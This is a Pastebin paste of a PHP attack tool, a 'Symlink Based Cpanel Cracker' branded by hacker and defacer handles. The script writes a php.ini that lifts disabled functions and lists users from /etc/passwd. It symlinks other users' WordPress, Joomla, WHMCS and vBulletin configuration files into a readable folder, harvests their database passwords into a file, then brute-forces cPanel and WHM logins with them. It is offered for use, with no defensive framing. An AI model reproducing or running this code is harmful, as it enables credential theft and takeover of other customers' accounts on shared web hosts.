Advertisement
alifazel

MrZ

Apr 26th, 2017
177
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.36 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4. $head = '
  5. <html>
  6. <head>
  7. </script>
  8. <title>--==[[ Don,Symlink Based Cpanel Cracker By M@rAz Ali]]==--</title>
  9. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  10.  
  11. <STYLE>
  12. body {
  13. font-family: Tahoma
  14. }
  15. tr {
  16. BORDER: dashed 1px #333;
  17. color: #FFF;
  18. }
  19. td {
  20. BORDER: dashed 1px #333;
  21. color: #FFF;
  22. }
  23. .table1 {
  24. BORDER: 0px Black;
  25. BACKGROUND-COLOR: Black;
  26. color: #FFF;
  27. }
  28. .td1 {
  29. BORDER: 0px;
  30. BORDER-COLOR: #333333;
  31. font: 7pt Verdana;
  32. color: Green;
  33. }
  34. .tr1 {
  35. BORDER: 0px;
  36. BORDER-COLOR: #333333;
  37. color: #FFF;
  38. }
  39. table {
  40. BORDER: dashed 1px #333;
  41. BORDER-COLOR: #333333;
  42. BACKGROUND-COLOR: Black;
  43. color: #FFF;
  44. }
  45. input {
  46. border : solid 3px ;
  47. border-color : #333;
  48. BACKGROUND-COLOR: white;
  49. font: 11pt Verdana;
  50. color: #333;
  51. }
  52. select {
  53. BORDER-RIGHT: Black 1px solid;
  54. BORDER-TOP: #DF0000 1px solid;
  55. BORDER-LEFT: #DF0000 1px solid;
  56. BORDER-BOTTOM: Black 1px solid;
  57. BORDER-color: #FFF;
  58. BACKGROUND-COLOR: Black;
  59. font: 8pt Verdana;
  60. color: Red;
  61. }
  62. submit {
  63. BORDER: buttonhighlight 2px outset;
  64. BACKGROUND-COLOR: Black;
  65. width: 30%;
  66. color: #FFF;
  67. }
  68. textarea {
  69. border : dashed 1px #333;
  70. BACKGROUND-COLOR: Black;
  71. font: Fixedsys bold;
  72. color: #999;
  73. }
  74. BODY {
  75. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  76. margin: 1px;
  77. color: Red;
  78. background-color: Black;
  79. }
  80. .main {
  81. margin : -287px 0px 0px -490px;
  82. BORDER: dashed 1px #333;
  83. BORDER-COLOR: #333333;
  84. }
  85. .tt {
  86. background-color: Black;
  87. }
  88.  
  89. A:link {
  90. COLOR: White; TEXT-DECORATION: none
  91. }
  92. A:visited {
  93. COLOR: White; TEXT-DECORATION: none
  94. }
  95. A:hover {
  96. color: Red; TEXT-DECORATION: none
  97. }
  98. A:active {
  99. color: Red; TEXT-DECORATION: none
  100. }
  101. </STYLE>
  102. <script language=\'javascript\'>
  103. function hide_div(id)
  104. {
  105. document.getElementById(id).style.display = \'none\';
  106. document.cookie=id+\'=0;\';
  107. }
  108. function show_div(id)
  109. {
  110. document.getElementById(id).style.display = \'block\';
  111. document.cookie=id+\'=1;\';
  112. }
  113. function change_divst(id)
  114. {
  115. if (document.getElementById(id).style.display == \'none\')
  116. show_div(id);
  117. else
  118. hide_div(id);
  119. }
  120. </script>'; ?>
  121. <html>
  122. <head>
  123. <?php
  124. echo $head ;
  125. echo '
  126.  
  127. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  128.  
  129.  
  130.  
  131. <td width="100%" align=center valign="top" rowspan="1"><font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Iranian Hackers ]]==--</font><br>
  132. <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Symlink Based</font><font color=white size=5 face="comic sans ms"><b> CPanel Cracker By</font><font color=green size=5 face="comic sans ms"><b> M@rAz Ali ]]==--</font> <div class="hedr">
  133.  
  134. <td height="10" align="left" class="td1"></td></tr><tr><td
  135. width="100%" align="center" valign="top" rowspan="1"><font
  136. color="red" face="comic sans ms"size="1"><b>
  137. <font color=#ff9933>
  138. ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Tabriz Hackers :D]]==--</font><br><font color=#ff9933>Web Fucker :D<br>
  139.  
  140. <font color=white>--==[[Dedicated to]]==--</font>
  141. <br># My Father and my Ex Teacher #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font><br><font color=#ff9933>
  142. ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
  143.  
  144. </table>
  145. </table> <div align=center><font color=#ff9933 font size=5><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%"><span class="footerlink">bro :Peyman Siyahi :D</span></marquee><br></font></div><div align=center><table width=50%><font color=#ff9933 font size=5>--==[[ Best Defacers :D ]]==--</font></table>
  146.  
  147. ';
  148.  
  149. ?>
  150. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
  151. <form method=post>
  152. <input type=submit name=ini value="Generate PHP.ini" /></form>
  153. <?php
  154. if(isset($_POST['ini']))
  155. {
  156.  
  157. $r=fopen('php.ini','w');
  158. $rr=" disable_functions=none ";
  159. fwrite($r,$rr);
  160. $link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
  161. echo $link;
  162.  
  163. }
  164. ?>
  165. <p>\\\\\\\\\\\\\\\\\\\\\\\\ Symlink based cpanel cracking wala jugaad XD ///////////////////////
  166. <?php
  167. //////////////////////////////////////
  168. ///// mass symlink ////////
  169. //////////////////////////////////////
  170. ?>
  171. <form method=post>
  172. <input type=submit name="usre" value="click to Extract usernames and mass symlink" /></form>
  173.  
  174.  
  175.  
  176.  
  177. <?php
  178. if(isset($_POST['usre'])){
  179. ?><form method=post>
  180. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
  181. foreach($users as $user)
  182. {
  183. $str=explode(":",$user);
  184. echo $str[0]."\n";
  185. }
  186.  
  187. ?></textarea><br><br>
  188. <input type=submit name=su value="bhaiyu ^_^ .. lets start" /></form>
  189. <?php } ?>
  190. <?php
  191. error_reporting(0);
  192. echo "<font color=red size=2 face=\"comic sans ms\">";
  193. if(isset($_POST['su']))
  194. {
  195.  
  196. $dir=mkdir('IcA',0777);
  197. $r = "OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  198. Options Indexes FollowSymLinks
  199. ForceType text/plain
  200. AddType text/plain .php
  201. AddType text/plain .html
  202. AddType text/html .shtml
  203. AddType txt .php
  204. AddHandler server-parsed .php
  205. AddHandler txt .php
  206. AddHandler txt .html
  207. AddHandler txt .shtml
  208. Options All
  209. Options All";
  210. $f = fopen('IcA/.htaccess','w');
  211.  
  212. fwrite($f,$r);
  213. $consym="<a href=IcA/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  214. echo "<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  215.  
  216. $usr=explode("\n",$_POST['user']);
  217.  
  218. foreach($usr as $uss )
  219. {
  220. $us=trim($uss);
  221.  
  222. $r="IcA/";
  223. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  224. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  225. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  226. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  227. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  228. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  229. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  230. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  231. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  232. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  233. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  234. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  235. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  236. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  237. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  238. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  239. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  240. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  241. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  242. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  243. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  244. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  245. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  246. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  247. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  248. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  249. }
  250. }
  251. ?>
  252. <?php
  253. //////////////////////////////////////
  254. /////password grabbing section////////
  255. //////////////////////////////////////
  256. ?>
  257.  
  258.  
  259.  
  260. <form method=post>
  261. <input type=submit name=sm value="start grabbing passwords from configuration files"></form>
  262. <?php
  263. error_reporting(0);
  264. set_time_limit(0);
  265. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  266. {
  267.  
  268. $ar0=explode($marqueurDebutLien, $text);
  269. $ar1=explode($marqueurFinLien, $ar0[1]);
  270. $ar=trim($ar1[0]);
  271. return $ar;
  272. }
  273.  
  274. if(isset($_POST['sm']))
  275.  
  276. {
  277. echo "bhai ji ... have a cup of tea.. tab tak main is server ki jaan nikalta hoon :P";
  278. $ffile=fopen('r.txt','a+');
  279.  
  280.  
  281. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/IcA/";
  282. $re=$r;
  283. $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  284.  
  285. $users=file("/etc/passwd");
  286. foreach($users as $user)
  287. {
  288.  
  289. $str=explode(":",$user);
  290. $usersss=$str[0];
  291. foreach($confi as $co)
  292. {
  293.  
  294.  
  295. $uurl=$re.$usersss.$co;
  296. $uel=$uurl;
  297.  
  298. $ch = curl_init();
  299.  
  300. curl_setopt($ch, CURLOPT_URL, $uel);
  301. curl_setopt($ch, CURLOPT_HEADER, 1);
  302. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  303. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  304. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  305. $result['EXE'] = curl_exec($ch);
  306. curl_close($ch);
  307. $uxl=$result['EXE'];
  308.  
  309.  
  310. if($uxl && preg_match('/table_prefix/i',$uxl))
  311. {
  312.  
  313. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>";
  314.  
  315. echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  316. if(!empty($dbp))
  317. $pass=$dbp."\n";
  318. fwrite($ffile,$pass);
  319.  
  320. }
  321. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  322. {
  323.  
  324. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website whmcs bhaiyu xD </font></td></tr></table>";
  325.  
  326. echo $dbp=entre2v2($uxl,"db_password = '","';");
  327. if(!empty($dbp))
  328. $pass=$dbp."\n";
  329. fwrite($ffile,$pass);
  330.  
  331. }
  332.  
  333.  
  334. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  335. {
  336.  
  337. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
  338.  
  339. echo $db=entre2v2($uxl,"password = '","';");
  340. if(!empty($db))
  341. $pass=$db."\n";
  342. fwrite($ffile,$pass);
  343. }
  344. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  345. {
  346.  
  347. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is vbulletin </font></td></tr></table>";
  348.  
  349. echo $db=entre2v2($uxl,"password'] = '","';");
  350. if(!empty($db))
  351. $pass=$db."\n";
  352. fwrite($ffile,$pass);
  353.  
  354. }
  355. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  356. {
  357.  
  358. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss </font></td></tr></table>";
  359.  
  360. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  361. if(!empty($db))
  362. $pass=$db."\n";
  363. fwrite($ffile,$pass);
  364. }
  365. elseif($uxl && preg_match('/dbpass/i',$uxl))
  366. {
  367.  
  368. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  369.  
  370. echo $db=entre2v2($uxl,"dbpass = '","';");
  371. if(!empty($db))
  372. $pass=$db."\n";
  373. fwrite($ffile,$pass);
  374. }
  375. elseif($uxl && preg_match('/dbpass/i',$uxl))
  376. {
  377.  
  378. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss </font></td></tr></table>";
  379.  
  380. echo $db=entre2v2($uxl,"dbpass = '","';");
  381. if(!empty($db))
  382. $pass=$db."\n";
  383. fwrite($ffile,$pass);
  384.  
  385. }
  386. elseif($uxl && preg_match('/dbpass/i',$uxl))
  387. {
  388.  
  389. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  390.  
  391. echo $db=entre2v2($uxl,"dbpass = \"","\";");
  392. if(!empty($db))
  393. $pass=$db."\n";
  394. fwrite($ffile,$pass);
  395. }
  396.  
  397.  
  398. }
  399. }
  400. }
  401. ?>
  402. <?php
  403. /////////////////////////////////
  404. ///// cpanel cracker ///////
  405. /////////////////////////////////
  406. ?>
  407.  
  408.  
  409. <form method=post>
  410. <input type=submit name=cpanel value="Auto username/password loading cpanel cracker"><p>
  411. <?php
  412.  
  413. if(isset($_POST['cpanel']))
  414. {
  415. ?>
  416. <form method=post><div align=center><table>
  417. want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
  418. <option name="op" value="whm">WHMPanel</option></table><p>
  419. <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  420. foreach($users as $user)
  421. {
  422. $str=explode(":",$user);
  423. echo $str[0]."\n";
  424. }
  425.  
  426. ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
  427. <?php
  428.  
  429. $d=getcwd()."/r.txt";
  430. $pf=file($d);
  431. foreach($pf as $rt)
  432. {
  433. $str=explode('\n',$rt);
  434. echo trim($str[0])."\n";
  435. } ?></textarea><p>
  436. <input type=submit name=cpanelcracking value="kerde khaat khadi >.<"></form>
  437. <?php
  438. }
  439. ?>
  440.  
  441.  
  442.  
  443.  
  444. <?php
  445. error_reporting(0);
  446. $connect_timeout=5;
  447. set_time_limit(0);
  448.  
  449. $userl=$_POST['usernames'];
  450. $passl=$_POST['passwords'];
  451. $attack=$_POST['op'];
  452. $target = "localhost";
  453.  
  454. if(isset($_POST['cpanelcracking']))
  455. {
  456. if($userl!=="" && $passl!=="")
  457. {
  458. if($_POST["op"]=="cp")
  459. {
  460. $cracked=$_POST['crack'];
  461. @fopen($cracked,'a');
  462. echo "bhai ji ^_^ ......now we are attacking cpanels....please wait till the end of process \n";
  463.  
  464.  
  465. }
  466. elseif($_POST["op"]=="whm")
  467. {
  468. @fopen($cracked,'a');
  469. echo "bhai ji ^_^ ......now we are attacking WHM panel....please wait till the end of process";
  470.  
  471. }
  472.  
  473. function cpanel($host,$user,$pass,$timeout){
  474. $ch = curl_init();
  475. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  476. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  477. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  478. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  479. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  480. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  481. $data = curl_exec($ch);
  482. if ( curl_errno($ch) == 0 ){
  483. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  484.  
  485.  
  486. }
  487.  
  488. curl_close($ch);}
  489.  
  490. $userlist=explode("\n",$userl);
  491. $passlist=explode("\n",$passl);
  492.  
  493. if ($attack == "cp")
  494. {
  495. foreach ($userlist as $user) {
  496. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
  497. $finaluser = trim($user);
  498. foreach ($passlist as $password ) {
  499. $finalpass = trim($password);
  500.  
  501.  
  502. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  503.  
  504. }
  505. }
  506.  
  507. }
  508.  
  509. function whm($host,$user,$pass,$timeout){
  510. $ch = curl_init();
  511. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  512. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  513. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  514. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  515. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  516. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  517. $data = curl_exec($ch);
  518. if ( curl_errno($ch) == 0 ){
  519. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  520.  
  521.  
  522.  
  523.  
  524. }
  525.  
  526.  
  527. curl_close($ch);}
  528. $userlist=explode("\n",$userl);
  529. $passlist=explode("\n",$passl);
  530.  
  531. if ($attack == "whm")
  532. {
  533. foreach ($userlist as $user) {
  534. echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
  535. $finaluser = trim($user);
  536. foreach ($passlist as $password ) {
  537. $finalpass = trim($password);
  538.  
  539. whm($target,$finaluser,$finalpass,$connect_timeout);
  540. }
  541. }
  542. }
  543. }
  544. elseif($userl=="")
  545. {
  546. echo "what are you doing bhai ji :( , you have left userlist field empty";
  547.  
  548. }
  549. elseif($passl=="")
  550. {
  551.  
  552. echo "bhai ji :( ... please put passwords in paasword list field";
  553. }
  554. }
  555. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement